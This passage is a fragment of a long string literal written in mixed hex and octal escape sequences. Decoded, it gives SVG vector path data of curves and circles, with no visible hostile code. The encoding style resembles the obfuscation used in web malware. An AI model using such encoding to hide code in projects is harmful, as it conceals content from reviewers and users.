2e\x36\x31\x32\x35\54\x2d\x30\56\x31\63\x34\x33\67\x20\x2d\63\x2e\x33\x30\65\x36\62\x2c\x30\56\60\64\60\x33\61\40\55\64\56\x39\64\x35\54\x30\x2e\x36\x34\65\143\55\x31\x2e\x32\63\66\62\x35\54\x30\56\x33\x37\x36\62\x35\x20\55\62\56\x31\x35\x2c\x31\56\x34\61\60\71\64\x20\x2d\x32\x2e\x33\x37\x38\x34\64\54\x32\x2e\66\70\x37\65\143\x2d\60\x2e\x32\x31\x35\x2c\x31\56\62\66\x33\x31\63\x20\60\x2e\62\70\62\x31\x39\54\x32\x2e\x35\x35\63\61\x33\x20\61\x2e\x33\60\x33\x34\x34\54\x33\x2e\x33\63\62\x35\143\55\x34\x2e\x35\x30\61\65\66\54\x36\56\x31\70\x31\x32\x35\40\55\x31\60\x2e\x36\x38\x32\70\x31\x2c\x31\60\x2e\70\65\67\x35\x20\55\61\x37\x2e\x39\x35\x32\65\54\61\63\56\65\64\65\143\60\56\x36\x33\61\65\66\54\x2d\x31\56\61\65\x35\66\62\40\x30\x2e\65\x35\x30\71\64\x2c\55\62\56\65\x35\x33\x31\x32\x20\55\x30\x2e\x32\60\61\x35\66\x2c\55\x33\56\66\x32\70\61\62\143\x2d\60\56\67\65\62\65\54\x2d\61\56\60\x37\65\40\55\x32\x2e\60\65\x35\71\64\x2c\55\x31\x2e\66\62\x35\71\x34\40\55\x33\x2e\x33\64\x35\x39\64\54\55\x31\x2e\64\x32\x34\x33\x38\x63\x2d\60\x2e\x31\64\x37\x38\x31\54\60\56\60\x32\x36\70\70\x20\x2d\60\56\x32\x39\65\x36\x32\54\60\56\60\x36\67\61\71\40\x2d\x30\x2e\64\63\x2c\60\56\x31\x30\x37\x35\x63\55\60\56\x35\x32\64\60\x36\54\60\x2e\x31\63\x34\x33\70\40\x2d\60\x2e\71\x39\x34\63\x37\54\x30\x2e\x33\70\71\66\71\40\55\61\x2e\63\x39\67\x35\x2c\60\x2e\x37\x35\62\65\143\x2d\62\x2e\66\x34\67\x31\71\54\62\x2e\62\x33\60\66\x33\x20\x2d\62\x2e\66\x37\x34\x30\66\x2c\65\56\x32\70\x30\x39\64\40\55\x32\x2e\65\70\54\x38\56\62\67\x37\x35\x63\x30\54\x30\56\61\63\x34\x33\70\40\60\x2c\x30\x2e\62\71\65\66\x33\x20\60\x2c\60\56\x34\63\143\x2d\x30\56\60\65\x33\67\x35\54\60\56\x35\x35\60\x39\x34\x20\x30\56\x30\61\63\64\64\54\61\x2e\x31\60\61\x38\x38\40\x30\x2e\62\61\65\54\x31\x2e\66\61\x32\x35\x63\x30\x2e\x32\60\61\65\66\54\x32\x2e\64\71\71\x33\70\x20\x30\56\65\63\x37\x35\x2c\x35\56\61\x34\66\65\x36\40\61\x2e\60\67\x35\54\67\56\71\65\x35\x63\61\x2e\x33\x35\67\61\x39\x2c\67\56\x31\62\x31\70\x38\40\63\56\61\61\67\x35\54\x31\x35\x2e\x31\x30\x33\x37\x35\40\x33\56\x31\61\x37\x35\x2c\x32\x30\56\62\x31\143\x30\x2c\x34\56\x39\63\61\x35\x36\40\x2d\64\56\63\x31\63\x34\x34\54\x39\56\62\64\65\40\x2d\71\56\x32\x34\x35\54\x39\56\62\64\x35\x63\x2d\x34\x2e\71\x33\x31\65\x36\x2c\60\40\x2d\71\x2e\62\64\65\54\x2d\64\56\x33\x31\63\64\x34\x20\55\x39\x2e\x32\64\65\54\55\x39\x2e\x32\64\x35\143\60\54\x2d\63\56\x35\x30\x37\61\71\40\x32\56\x30\62\71\x30\x36\x2c\x2d\x36\56\65\70\x34\x33\67\40\64\56\67\x33\54\x2d\x38\x2e\x30\66\x32\65\x63\60\56\x31\64\x37\70\61\x2c\55\x30\x2e\x30\66\67\61\x39\x20\60\x2e\x32\71\x35\x36\x33\54\x2d\60\56\61\x33\64\x33\67\x20\60\56\x34\63\x2c\55\60\56\62\61\x35\x63\x33\56\x33\x30\65\x36\x33\54\x2d\62\56\x35\x33\71\66\x39\40\65\x2e\64\65\65\x36\63\x2c\55\66\56\71\60\x36\70\x37\40\66\56\x30\x32\54\x2d\x31\x32\56\x31\64\x37\65\143\60\56\x32\71\x35\66\x33\x2c\55\62\x2e\x37\x31\x34\63\x37\40\60\56\60\x31\63\x34\x34\x2c\x2d\65\56\66\70\64\x30\x36\40\x2d\x30\56\70\x36\54\55\x38\x2e\67\x30\x37\65\x63\x2d\60\56\x30\65\x33\x37\65\54\55\60\x2e\63\x33\x35\x39\64\x20\55\60\56\x31\x36\61\x32\x35\x2c\55\x30\56\x36\65\x38\x34\64\40\55\60\56\63\62\62\x35\54\x2d\x30\x2e\x39\66\x37\65\x63\55\60\56\x38\x33\63\x31\x32\54\x2d\62\56\64\x37\62\x35\x20\x2d\x32\56\x30\x34\x32\x35\54\x2d\x35\56\60\x31\x32\61\71\40\55\x33\56\70\67\x2c\x2d\x37\56\64\x31\x37\65\143\x2d\60\56\66\x37\x31\x38\67\x2c\x2d\61\56\61\x34\x32\x31\x39\40\55\61\56\71\62\x31\x35\x36\54\x2d\x31\56\70\60\60\x36\62\40\55\63\x2e\62\63\70\x34\x34\x2c\x2d\61\x2e\66\x39\63\x31\62\x63\x2d\x31\56\x33\x33\x30\x33\61\x2c\x30\x2e\60\x39\64\x30\66\40\x2d\x32\56\x34\65\71\x30\66\54\60\56\71\65\x34\x30\x36\40\55\62\56\x39\x34\x32\x38\61\x2c\62\56\x31\71\60\63\x31\x63\x2d\x30\56\x34\x37\60\x33\61\x2c\x31\x2e\62\x32\x32\x38\x31\40\x2d\x30\56\x32\x30\61\x35\x36\54\x32\x2e\x36\x32\60\63\61\40\x30\56\x36\x39\70\x37\65\x2c\63\56\65\x38\67\70\x31\x63\60\56\61\x30\x37\65\54\60\56\61\64\x37\x38\x31\x20\x30\x2e\x32\x31\x35\54\x30\56\x32\x38\62\61\x39\40\60\x2e\63\62\x32\65\54\x30\x2e\64\x33\x63\x2d\67\56\x36\x37\x32\x38\x31\x2c\55\61\56\67\70\x37\x31\71\x20\55\61\x34\x2e\x35\71\63\x31\62\x2c\55\x35\56\x38\64\x35\63\61\x20\x2d\61\71\x2e\70\x38\67\x35\x2c\x2d\x31\x31\56\x33\x39\x35\143\x2d\x30\56\64\x30\63\61\62\54\55\60\56\x34\64\x33\x34\64\40\x2d\60\56\x39\x32\x37\x31\71\x2c\x2d\60\x2e\67\x37\x39\63\67\x20\55\x31\x2e\65\x30\65\x2c\55\60\x2e\71\x36\67\x35\143\x2d\x33\56\62\65\x31\70\67\x2c\x2d\62\x2e\x33\61\x31\62\65\40\55\67\56\x34\63\x30\x39\64\54\x2d\x32\x2e\x34\70\65\x39\x34\40\x2d\x31\x30\x2e\x37\65\x2c\55\x31\x2e\61\70\62\x35\143\x2d\63\56\x36\x35\65\54\61\x2e\64\x33\x37\x38\x31\x20\55\x36\x2e\x36\66\65\54\x34\56\x33\x31\63\64\64\x20\55\x39\56\60\x33\54\x37\x2e\66\63\x32\x35\x63\x2d\60\56\60\x32\66\70\67\x2c\60\56\x30\x34\60\63\x31\40\55\60\56\x30\70\60\66\x32\x2c\60\56\x30\x36\67\61\71\x20\55\x30\56\x31\x30\67\x35\x2c\60\56\x31\60\67\65\143\x2d\61\56\70\x30\x30\66\62\x2c\62\x2e\62\x33\60\66\x33\x20\55\64\x2e\65\71\65\x36\x32\54\63\x2e\66\65\65\40\x2d\x37\x2e\x35\x32\x35\54\x33\56\66\65\x35\x63\x2d\64\x2e\71\x33\x31\x35\x36\x2c\60\40\x2d\x39\x2e\x33\x35\62\x35\x2c\55\x34\56\x33\61\x33\x34\64\40\55\x39\x2e\63\65\62\65\x2c\x2d\x39\x2e\x32\x34\65\x63\60\54\x2d\64\56\71\63\61\x35\x36\40\x34\x2e\x34\x32\x30\71\x34\54\x2d\x39\56\63\65\62\65\x20\71\x2e\x33\x35\x32\65\x2c\x2d\71\56\x33\65\62\65\143\62\56\61\x37\x36\x38\70\x2c\x30\x20\x33\x2e\63\61\x39\60\66\54\x30\x2e\x34\x31\66\x35\x36\40\64\56\71\64\65\x2c\61\x2e\x35\60\65\x63\60\x2e\61\67\64\66\71\54\60\x2e\x31\x32\x30\x39\x34\40\x30\56\x33\x34\71\x33\70\54\60\56\62\62\x38\x34\x34\x20\x30\x2e\x35\x33\x37\65\54\x30\56\63\62\62\x35\143\63\x2e\x31\63\x30\71\x34\54\61\x2e\63\x38\x34\x30\x36\x20\66\x2e\x33\64\62\65\x2c\60\x2e\x39\x30\60\63\x31\x20\x39\x2e\x34\66\54\55\60\x2e\x37\65\62\65\143\x33\56\x31\61\67\65\54\x2d\x31\56\66\x35\x32\x38\61\x20\x35\x2e\x39\x32\65\71\64\54\x2d\x35\56\66\x38\x34\x30\66\40\x34\x2e\71\64\65\54\x2d\61\x30\x2e\x33\62\x63\x2d\x30\x2e\60\65\63\67\65\x2c\55\x30\x2e\62\x31\x35\40\55\60\56\61\62\x30\71\x34\x2c\55\60\56\x34\64\63\x34\64\40\55\60\56\x32\x31\65\x2c\55\60\x2e\x36\64\65\x63\55\60\x2e\62\x35\65\63\61\54\x2d\x32\x2e\x31\x35\x20\x2d\60\56\x34\x33\54\55\64\x2e\62\x37\63\x31\62\40\x2d\x30\56\x34\x33\x2c\x2d\x36\x2e\62\x33\x35\x63\x30\x2c\55\x35\x2e\71\66\x36\62\x35\x20\x31\x2e\x34\62\64\x33\70\x2c\x2d\x31\61\x2e\65\x34\62\x38\61\40\x33\56\x38\x37\x2c\55\x31\66\56\x35\65\65\x63\x30\x2e\70\67\63\64\64\54\x30\56\63\x34\71\63\x38\40\x31\x2e\70\64\60\x39\64\x2c\x30\x2e\63\x32\62\x35\40\x32\56\x36\70\67\65\x2c\55\60\56\x30\x36\67\x31\71\x63\60\56\x38\66\54\55\60\x2e\x33\67\66\62\65\x20\61\x2e\65\61\70\x34\x34\x2c\x2d\x31\56\60\70\x38\x34\64\x20\x31\56\x38\x32\x37\65\54\x2d\61\x2e\x39\x37\x35\x33\61\x63\x30\x2e\x31\x32\x30\x39\64\54\x2d\x30\x2e\63\x30\71\60\x36\x20\60\56\x31\x38\x38\x31\63\54\x2d\60\x2e\66\63\x31\65\x36\x20\60\x2e\62\x31\65\54\55\x30\56\x39\66\67\x35\x76\55\60\56\64\63\143\x30\56\63\67\x36\x32\65\x2c\55\x31\x2e\67\70\67\61\71\x20\60\x2e\x32\60\x31\x35\66\x2c\55\x33\56\66\60\61\x32\x35\40\55\x30\56\x33\62\x32\x35\x2c\55\x35\56\62\66\67\x35\x63\x2d\x30\x2e\60\65\63\67\65\54\x2d\60\56\63\x37\66\62\x35\x20\x2d\x30\56\x31\66\61\62\x35\54\x2d\60\x2e\67\x33\71\x30\x36\40\x2d\x30\x2e\63\x32\x32\65\x2c\55\61\56\60\67\x35\143\55\60\x2e\x30\x32\66\x38\x37\x2c\55\x30\56\x30\x36\x37\x31\x39\40\x2d\x30\56\60\70\x30\66\x32\54\55\x30\56\x31\x34\x37\x38\61\40\55\x30\x2e\61\60\67\x35\54\x2d\60\56\x32\x31\x35\x63\x2d\60\56\x30\66\67\61\x39\54\55\60\x2e\x31\x30\67\x35\x20\55\x30\56\x31\x33\x34\63\67\x2c\x2d\x30\x2e\x32\x31\x35\x20\x2d\60\x2e\62\61\x35\54\x2d\60\x2e\63\x32\x32\65\x63\55\x31\x2e\60\x30\x37\70\x31\x2c\55\x32\x2e\61\60\71\x36\x39\40\x2d\x32\56\x33\71\61\x38\x37\x2c\x2d\x34\x2e\60\x37\x31\65\x36\40\55\64\x2e\60\x38\x35\x2c\x2d\65\x2e\71\61\x32\65\x63\55\x33\x2e\x36\x38\61\70\67\54\55\64\56\x30\60\64\x33\x37\x20\x2d\70\x2e\x34\x33\70\67\x35\54\55\x37\56\64\61\67\x35\40\x2d\x31\62\56\x39\x2c\55\x39\56\62\64\65\143\55\x30\x2e\60\x36\x37\x31\x39\x2c\x2d\60\56\60\64\60\x33\x31\40\x2d\60\56\x31\x34\67\70\61\54\x2d\60\x2e\60\70\60\x36\62\x20\x2d\60\56\x32\61\x35\x2c\55\x30\56\x31\x30\x37\65\143\55\x33\56\x37\x36\62\x35\x2c\x2d\x31\x2e\62\x34\x39\x36\x39\x20\55\66\56\x32\x33\x35\54\55\64\x2e\x37\x34\63\64\64\x20\x2d\x36\x2e\62\x33\x35\x2c\x2d\x38\x2e\70\x31\x35\x63\60\54\55\64\56\71\63\x31\65\66\x20\64\x2e\63\x31\x33\x34\64\54\x2d\71\x2e\62\64\65\40\x39\x2e\62\64\x35\54\55\71\x2e\62\x34\65\x63\x34\x2e\x39\x33\61\65\x36\54\60\40\71\x2e\63\65\x32\65\x2c\x34\x2e\63\61\x33\x34\x34\x20\x39\x2e\x33\65\62\65\54\71\56\62\64\65\143\x30\x2c\60\56\70\x30\x36\62\x35\40\55\60\56\x32\x36\70\67\x35\x2c\x31\x2e\x35\x30\x35\40\x2d\60\x2e\66\64\65\x2c\x33\56\60\x31\x63\55\x30\56\60\x36\x37\61\x39\x2c\60\x2e\x32\70\62\x31\x39\x20\x2d\x30\56\61\60\67\x35\54\x30\56\x35\66\x34\x33\x38\x20\55\x30\x2e\61\x30\x37\x35\x2c\60\x2e\70\x36\x76\60\56\x36\x34\65\x68\60\56\x31\x30\x37\x35\x63\55\60\56\67\x33\x39\60\x36\x2c\64\x2e\x34\x32\60\x39\x34\40\60\56\x38\67\x33\x34\x34\54\x38\x2e\x38\71\65\x36\x33\x20\63\x2e\x36\x35\65\x2c\x31\62\x2e\x35\67\67\x35\143\60\56\71\x34\x30\66\x33\54\x31\56\62\63\66\x32\x35\40\x32\x2e\60\x35\x35\x39\x34\x2c\x32\56\63\61\61\62\x35\40\x33\x2e\63\63\62\x35\x2c\x33\x2e\x32\62\65\x63\x30\x2e\66\67\61\x38\70\54\x31\56\x31\x38\62\x35\x20\61\x2e\71\x37\65\x33\61\x2c\x31\56\x38\x35\64\x33\70\40\x33\56\x33\x33\62\65\54\61\56\x37\62\143\62\56\x32\x31\x37\x31\71\x2c\x30\x2e\x36\63\61\65\x36\x20\x34\56\x38\63\x37\x35\54\x30\56\x34\x38\63\67\x35\x20\67\x2e\60\71\65\54\x2d\60\56\67\65\x32\65\x63\x31\56\65\67\62\61\71\54\55\60\56\70\66\x20\62\56\62\x33\x30\66\63\54\55\x32\56\x37\66\x38\61\62\40\x31\56\x35\x30\x35\x2c\55\x34\x2e\x34\60\x37\x35\x63\61\56\67\x33\x33\64\x34\54\55\x30\x2e\70\66\x20\63\x2e\x36\x30\61\62\x35\54\x2d\61\56\x35\64\65\x33\x31\40\65\56\64\x38\62\x35\54\x2d\62\x2e\61\x35\x63\60\x2e\62\70\62\61\x39\x2c\x31\x2e\60\x33\x34\66\x39\40\x31\x2e\60\62\x31\62\x35\x2c\x31\x2e\70\70\x31\x32\65\40\x32\x2e\60\x30\62\61\71\x2c\62\56\63\61\61\62\65\x63\x30\x2e\x39\x38\x30\x39\x34\54\x30\56\x34\61\66\x35\66\x20\x32\56\61\x30\x39\x36\x39\x2c\60\x2e\x33\66\62\70\x31\x20\63\56\60\65\60\63\61\54\55\60\x2e\x31\x36\x31\x32\65\143\x31\x2e\x39\x30\70\61\x33\54\x2d\x31\x2e\x30\x32\61\x32\x35\x20\x33\x2e\x33\65\x39\x33\70\54\55\x32\56\x38\66\x32\x31\71\x20\64\56\61\x39\x32\65\x2c\55\65\56\x31\66\x63\x30\56\x35\x37\x37\x38\x31\x2c\55\60\56\67\66\65\71\x34\40\60\56\70\60\x36\x32\x35\54\55\x31\56\x37\64\66\70\67\x20\x30\x2e\66\64\x35\54\x2d\x32\56\66\x38\67\65\143\60\56\x31\x32\x30\71\64\x2c\55\x30\56\71\x30\x30\63\61\40\60\56\61\67\64\66\x39\54\55\61\x2e\70\x31\64\60\66\40\60\56\61\x30\x37\65\x2c\x2d\x32\56\67\71\65\x63\x2d\x30\56\63\x34\71\x33\67\54\55\x34\x2e\x36\x34\71\x33\x37\40\55\62\x2e\64\x34\x35\x36\62\x2c\x2d\x31\x30\x2e\65\64\x38\x34\64\x20\55\66\x2e\x33\x34\62\x35\54\55\61\x38\56\70\61\62\65\143\55\60\x2e\x30\x31\x33\64\x34\54\55\60\56\x30\x36\67\61\x39\40\x30\x2e\x30\61\x33\64\x34\x2c\x2d\60\x2e\62\x36\x38\67\65\x20\60\54\x2d\60\56\63\x32\62\x35\143\x2d\x30\x2e\x30\64\60\63\61\x2c\55\60\x2e\61\64\67\70\61\x20\55\x30\56\x30\70\60\66\62\54\55\60\x2e\63\x32\62\x35\x20\x2d\x30\x2e\x31\60\67\65\x2c\55\x30\56\64\63\143\x2d\60\56\x30\66\67\x31\x39\x2c\x2d\60\56\62\61\65\x20\55\60\56\x31\63\x34\x33\67\54\x2d\60\x2e\63\70\x39\66\x39\40\55\60\x2e\x32\x31\65\x2c\x2d\x30\56\x36\x34\65\x63\x2d\60\x2e\x31\66\61\x32\65\x2c\x2d\60\x2e\65\x31\60\x36\x32\40\x2d\x30\x2e\64\64\63\x34\64\54\x2d\61\56\61\x36\71\60\66\x20\55\x30\x2e\x36\x34\65\x2c\55\61\56\x38\x32\67\65\x63\x2d\x30\56\64\x30\x33\61\62\54\55\61\x2e\x33\63\60\x33\x31\x20\55\x30\56\x36\64\65\54\55\63\56\60\63\66\70\67\x20\55\x30\56\66\x34\x35\54\x2d\x33\x2e\x31\x31\67\x35\x63\x30\54\x2d\x34\x2e\x39\63\x31\65\66\x20\x34\56\63\x31\63\64\64\54\x2d\x39\x2e\x32\x34\65\x20\71\56\62\x34\x35\54\x2d\71\56\x32\64\x35\172\x4d\61\x32\x37\56\62\x38\x2c\x32\60\56\x39\66\62\65\x63\55\67\56\x35\x31\x31\65\66\54\60\x20\x2d\x31\x33\x2e\67\66\x2c\66\56\62\x34\x38\x34\x34\x20\55\x31\x33\x2e\x37\66\x2c\x31\x33\x2e\67\x36\x63\60\x2c\x33\x2e\x32\67\x38\x37\65\x20\55\x30\56\65\x31\x30\x36\x32\54\64\56\71\63\x31\65\x36\40\x2d\60\56\67\65\62\x35\x2c\65\56\64\x38\62\65\x63\x2d\x30\56\60\x35\x33\x37\65\x2c\x30\56\61\x30\x37\65\40\60\x2e\x30\62\x36\70\70\x2c\60\56\x30\x36\x37\61\71\40\x30\x2c\60\x2e\x31\60\x37\65\x63\x2d\x30\x2e\60\x34\x30\63\x31\54\60\x2e\x30\65\x33\x37\x35\40\x2d\x30\56\61\66\x31\x32\65\x2c\x30\56\x31\66\x31\x32\x35\x20\55\x30\x2e\61\x30\67\x35\x2c\x30\56\x31\60\x37\x35\x63\x2d\61\x2e\63\x31\x36\70\67\54\61\56\61\x32\x38\67\65\x20\x2d\x31\x2e\x35\x38\x35\66\62\x2c\x33\56\60\66\63\x37\x35\x20\x2d\x30\56\66\63\61\x35\66\x2c\64\x2e\x35\x31\65\143\x30\56\71\x35\x34\60\x36\x2c\61\56\64\x33\x37\x38\x31\40\x32\56\70\63\x35\x33\x31\54\61\56\x39\x34\x38\64\x34\x20\x34\56\63\71\x34\x30\66\x2c\61\56\x31\70\x32\x35\143\x30\x2c\60\40\60\56\x38\x31\x39\x36\x39\x2c\55\60\56\x35\66\64\x33\67\40\61\56\62\x39\54\55\61\56\x30\x37\65\x63\60\x2e\64\x37\x30\x33\61\x2c\x2d\x30\x2e\65\x31\x30\66\62\x20\61\x2e\60\60\x37\x38\61\54\55\x31\x2e\x31\x35\65\x36\x32\40\61\56\x33\71\67\65\54\x2d\62\x2e\x30\64\x32\x35\143\x30\x2e\x37\67\71\x33\x38\x2c\55\x31\x2e\67\66\60\x33\x31\40\61\56\62\71\x2c\55\64\x2e\63\64\x30\x33\x31\x20\x31\x2e\62\x39\x2c\55\x38\56\62\x37\x37\x35\143\60\x2c\55\63\56\64\x39\x33\x37\x35\x20\x33\56\x33\x38\66\62\x35\54\55\66\x2e\70\70\x20\x36\x2e\x38\x38\54\x2d\x36\56\70\x38\x63\x33\x2e\x36\64\x31\65\x36\x2c\x30\40\66\56\70\70\x2c\x32\x2e\x39\61\x35\x39\x34\x20\x36\56\x38\70\x2c\x36\x2e\x38\70\143\60\x2c\63\56\x34\x39\63\x37\65\x20\x2d\63\56\x33\70\66\62\65\x2c\66\x2e\x38\x38\40\x2d\x36\56\x38\x38\54\x36\x2e\x38\x38\x63\x2d\x35\56\x33\x33\x34\x36\x39\x2c\x30\40\x2d\67\56\x36\x33\x32\x35\54\64\56\66\x32\x32\x35\40\55\67\x2e\x36\63\x32\65\54\x34\x2e\x36\62\x32\x35\143\55\61\x2e\60\67\x35\x2c\61\x2e\x35\x37\62\61\x39\40\55\60\56\x36\65\70\x34\x34\x2c\x33\56\x37\x30\x38\x37\x35\x20\x30\x2e\x39\x31\x33\x37\x35\x2c\64\56\x37\x38\x33\x37\65\143\61\56\x35\67\x32\x31\71\x2c\x31\56\x30\x37\x35\40\x33\56\x37\60\70\x37\65\x2c\x30\x2e\x36\65\x38\x34\64\40\64\56\67\70\63\67\x35\54\x2d\60\x2e\x39\x31\x33\x37\x35\143\x30\x2c\x30\40\61\x2e\67\x36\x30\x33\x31\54\55\61\x2e\66\x31\62\65\x20\61\56\71\x33\x35\54\55\61\x2e\66\x31\x32\x35\143\67\56\x35\x31\61\65\66\x2c\x30\40\x31\x33\x2e\67\x36\54\x2d\66\56\x32\x34\70\64\x34\x20\61\63\x2e\x37\66\54\x2d\61\63\x2e\x37\66\x63\x30\54\55\67\56\x37\x34\x20\x2d\x36\x2e\x33\71\66\62\65\54\x2d\61\x33\x2e\67\66\x20\x2d\61\x33\56\67\x36\54\x2d\61\63\x2e\x37\66\x7a\115\x39\66\x2e\63\x32\x2c\65\66\56\x37\66\143\55\70\56\x35\60\x35\71\64\54\60\x20\55\x31\65\x2e\x34\x38\x2c\x36\x2e\71\x37\x34\60\x36\x20\55\61\65\x2e\64\70\x2c\x31\65\56\64\x38\x63\x30\54\70\56\65\x30\65\x39\64\x20\x36\x2e\x39\x37\64\60\x36\54\x31\65\56\x34\x38\x20\61\65\x2e\x34\x38\x2c\x31\x35\x2e\x34\x38\143\x38\x2e\65\60\x35\x39\x34\54\60\x20\61\x35\56\x34\x38\54\55\66\56\x39\x37\x34\x30\x36\40\x31\x35\x2e\x34\70\x2c\x2d\x31\x35\56\64\70\143\x30\x2c\55\70\x2e\65\60\65\x39\64\40\x2d\x36\x2e\x39\x37\64\60\66\54\x2d\61\x35\x2e\64\70\x20\x2d\61\65\56\x34\70\x2c\55\61\65\x2e\x34\x38\x7a\115\61\71\x2e\x32\64\62\x35\x2c\x36\x33\x2e\x33\61\x37\x35\143\55\x37\56\60\x30\60\x39\x34\54\x30\40\x2d\x31\x33\x2e\60\60\67\x35\x2c\x35\56\66\64\x33\67\x35\x20\55\61\63\x2e\x30\60\x37\65\x2c\61\x33\56\x30\60\x37\65\143\60\54\x37\x2e\x33\66\63\x37\x35\x20\66\56\60\60\66\x35\66\54\x31\x33\x2e\61\x31\65\40\61\x33\56\60\x30\x37\x35\x2c\61\63\56\x31\x31\65\x63\x32\x2e\66\63\x33\x37\x35\x2c\60\x20\64\56\x37\65\x36\x38\70\54\55\x30\x2e\71\x32\67\61\71\x20\x36\x2e\63\x34\62\65\54\x2d\x31\x2e\67\62\x63\x33\56\x34\64\x2c\55\61\x2e\67\62\x20\x35\x2e\67\65\61\x32\x35\x2c\x2d\62\x2e\71\60\x32\65\40\71\56\60\x33\54\x2d\62\x2e\61\x35\x63\x31\x2e\x32\x33\66\62\x35\x2c\60\56\x34\x30\x33\61\x33\40\62\x2e\x35\x39\x33\64\x34\x2c\x30\56\60\x39\x34\60\66\x20\x33\x2e\x35\x30\67\61\71\x2c\55\x30\x2e\70\x31\71\66\71\x63\x30\x2e\71\x31\x33\x37\x35\x2c\55\60\x2e\71\x31\x33\67\65\40\61\x2e\x32\x34\71\66\x39\x2c\x2d\x32\x2e\62\x37\60\71\64\x20\x30\56\x38\x34\x36\x35\66\x2c\55\x33\56\65\x30\x37\61\x39\143\55\x30\56\x34\60\x33\61\x32\x2c\55\x31\x2e\x32\x33\x36\62\x35\40\55\61\56\x34\x36\64\66\x39\x2c\x2d\x32\56\61\x33\66\65\66\x20\55\62\56\x37\x34\x31\x32\x35\54\55\62\56\x33\63\x38\61\x33\x63\55\x35\56\66\x37\x30\x36\x32\x2c\55\x31\x2e\x33\60\x33\x34\64\x20\55\61\x30\x2e\62\61\x32\x35\54\x30\56\x39\66\67\65\40\x2d\x31\63\56\66\65\x32\x35\54\x32\56\x36\x38\x37\x35\x63\x2d\61\x2e\61\66\x39\x30\66\x2c\x30\x2e\x35\x39\x31\62\x35\x20\55\x32\56\65\x32\x36\62\x35\54\x30\56\71\66\x37\x35\x20\55\63\56\x33\63\62\x35\x2c\60\x2e\71\66\67\65\143\x2d\63\x2e\x33\x31\71\x30\66\54\x30\x20\x2d\66\x2e\61\62\x37\x35\54\55\x32\x2e\65\71\x33\x34\x34\x20\x2d\x36\56\61\62\x37\65\54\55\x36\56\62\63\65\143\60\x2c\55\63\x2e\x36\x34\61\65\66\x20\62\x2e\x38\60\70\64\x34\x2c\x2d\x36\56\61\62\67\x35\40\x36\x2e\x31\62\67\x35\54\x2d\66\x2e\61\x32\67\x35\x63\x32\56\60\70\x32\70\61\54\x30\40\63\x2e\x34\62\x36\x35\66\54\x30\x2e\67\x32\65\66\63\x20\64\56\x36\62\62\65\x2c\x32\56\x31\x35\143\x30\x2e\60\66\67\x31\71\x2c\x30\56\x30\x38\x30\x36\63\x20\60\x2e\x31\63\64\x33\x38\x2c\60\x2e\x31\64\67\70\61\x20\x30\56\x32\61\65\54\x30\56\x32\x31\65\143\61\56\70\64\x30\x39\64\x2c\x31\56\70\64\60\x39\64\x20\64\56\x30\63\61\62\65\x2c\62\56\67\64\61\x32\65\x20\66\x2e\63\x34\62\65\54\63\x2e\x32\x32\x35\143\x32\56\x33\x31\61\62\65\x2c\60\56\x34\x38\63\x37\x35\x20\64\x2e\x36\x38\x39\66\71\54\60\56\x36\60\64\x36\x39\x20\x37\56\60\x39\x35\x2c\55\x30\x2e\64\x33\x63\x31\x2e\x32\x36\x33\61\63\54\x2d\60\x2e\63\x38\x39\x36\x39\40\62\x2e\x31\71\60\x33\x31\54\55\x31\56\x34\x39\61\x35\66\40\62\x2e\63\67\x38\64\64\x2c\55\62\56\x37\x39\65\143\60\56\x31\x38\x38\61\x33\54\55\x31\56\x33\x31\x36\x38\67\40\55\60\56\64\60\x33\61\x32\54\x2d\62\x2e\x36\62\60\x33\61\x20\x2d\61\56\65\x30\65\x2c\x2d\63\x2e\x33\x35\71\63\x37\x63\55\x31\56\61\60\61\70\67\x2c\55\x30\56\x37\62\x35\66\x33\x20\x2d\62\56\65\x32\x36\x32\65\54\55\60\x2e\x37\66\65\71\x34\40\55\x33\56\x36\x36\x38\64\x34\x2c\55\60\x2e\60\x38\x30\66\x33\143\x30\54\60\40\55\61\x2e\x34\61\x30\71\x34\54\60\x2e\61\70\x38\x31\x33\40\x2d\62\x2e\67\x39\x35\x2c\55\x30\56\x31\x30\67\65\143\x2d\x31\x2e\x33\70\64\x30\66\x2c\55\60\56\x32\71\65\x36\x32\40\x2d\62\x2e\x37\x39\65\54\55\61\x2e\x30\67\x35\40\x2d\x33\56\60\x31\x2c\55\61\x2e\62\71\x63\55\x32\56\62\65\67\x35\54\x2d\62\x2e\65\x38\40\x2d\x35\56\66\x37\x30\x36\62\54\55\x34\56\x34\60\67\65\x20\55\x39\56\66\67\x35\x2c\x2d\64\56\x34\x30\67\x35\x7a\115\x39\x36\56\63\62\54\66\63\56\x36\64\x63\x34\56\67\x38\63\67\x35\54\x30\40\x38\x2e\66\54\63\56\70\61\x36\62\x35\x20\70\x2e\66\x2c\x38\x2e\66\x63\60\54\x34\56\x37\70\63\x37\x35\x20\55\x33\x2e\70\x31\66\62\x35\x2c\70\x2e\x36\x20\55\70\x2e\x36\x2c\x38\x2e\66\143\55\x34\56\x37\x38\63\67\x35\x2c\60\x20\x2d\x38\56\x36\54\x2d\x33\56\70\61\66\62\x35\40\x2d\70\x2e\x36\54\55\x38\x2e\66\x63\60\54\55\x34\x2e\67\x38\63\x37\65\40\63\x2e\x38\61\x36\x32\65\54\x2d\x38\56\66\40\70\x2e\66\x2c\55\70\x2e\x36\172\115\x37\x30\56\65\62\x2c\x38\x36\143\55\x36\56\66\x31\x31\x32\65\x2c\x30\x20\x2d\x31\62\x2e\60\x34\x2c\65\x2e\x34\x32\70\67\65\x20\55\x31\x32\x2e\x30\x34\54\x31\x32\56\x30\64\143\60\x2c\x36\56\x36\61\61\x32\x35\40\x35\56\x34\x32\70\67\x35\54\x31\62\56\x30\x34\x20\61\62\x2e\60\x34\x2c\61\x32\56\x30\64\x63\x36\56\x36\61\x31\x32\65\54\60\40\x31\62\56\60\x34\54\55\x35\x2e\x34\62\70\67\x35\x20\61\x32\x2e\60\x34\x2c\x2d\61\62\x2e\x30\x34\x63\60\x2c\55\66\x2e\66\x31\61\x32\65\40\x2d\x35\x2e\64\x32\x38\67\x35\54\x2d\x31\62\56\x30\64\x20\55\61\x32\x2e\60\64\54\x2d\x31\x32\x2e\x30\64\x7a\x4d\67\60\x2e\65\x32\x2c\71\62\56\x38\x38\x63\x32\56\70\x38\71\60\66\54\x30\40\x35\x2e\61\x36\54\62\56\62\67\x30\x39\64\40\x35\56\61\x36\54\65\56\x31\66\x63\60\x2c\x32\x2e\70\x38\x39\x30\x36\x20\55\62\x2e\x32\x37\60\x39\x34\54\65\56\x31\66\40\55\x35\x2e\61\66\54\x35\x2e\x31\66\143\55\62\56\x38\x38\x39\60\66\54\60\x20\55\x35\56\61\